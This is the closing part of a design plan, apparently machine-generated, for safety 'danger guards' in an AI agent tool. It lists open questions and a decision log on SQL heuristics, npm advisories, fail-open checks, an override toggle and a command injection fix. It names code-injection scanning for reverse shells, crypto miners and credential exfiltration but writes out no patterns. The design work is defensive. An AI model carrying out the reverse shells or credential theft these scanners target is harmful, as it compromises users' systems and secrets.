  • Per-category danger guard settings: Should users be able to disable SQL checks but keep npm checks? The category field on DangerCheckResult enables this in the future, but it's not in the MVP.
  • MCP tool danger detection: MCP tools are opaque but could execute SQL or install packages. Future option: let MCP server authors declare danger levels in tool metadata.

Decision Log

| Decision | Reasoning |
| --- | --- |
| Heuristic SQL detection over LLM-based | LLM adds latency, cost, and provider dependency (violates Backend-Flexible principle). Heuristics catch 95%+ of destructive patterns with zero false positives on the obvious cases. |
| npm audit advisories over Socket.dev | Free, official, no API key needed. Socket.dev is more comprehensive but adds external dependency. Can upgrade later. |
| Include narrow code injection scanning in MVP | User decided. Scoped to near-zero false positive patterns (reverse shells, crypto miners, credential exfiltration). Performance impact is minimal (regex-only). |
| Include dangerous approval override in MVP | User decided. Mitigated with confirmation dialog (typed "I understand"), persistent UI indicator, and telemetry tracking. |
| Always show danger context (even with auto-approve OFF) | Enhances decision quality for all users. Same consent banner component, just with upgraded styling when danger is detected. |
| Advisory (forced consent) over blocking | Users can still proceed past warnings. This respects user autonomy while ensuring informed consent. The override toggle is the escape hatch from even this. |
| Two buttons only on danger banner (no "Always allow") | Permanently auto-approving dangerous actions defeats the purpose. Users approve per-instance or use the global override. |
| dangerCheck per-tool over centralized detection | Each tool knows its domain best. SQL heuristics are completely different from npm validation. Co-locating detection with the tool is cleaner and more extensible. |
| Fix command injection independently | This is a security bug that exists today, not a feature. Ship the fix immediately without waiting for the full danger guards feature. |
| Fail-open when checks are unavailable | Fail-closed would mean a third-party API outage blocks the user's work. Fail-open with notification is the right balance for a local-first tool. |
| aria-live="polite" over "assertive" | The agent is paused waiting for consent -- there's no urgency. "Assertive" would disruptively interrupt screen reader users. |

Generated by dyad:swarm-to-plan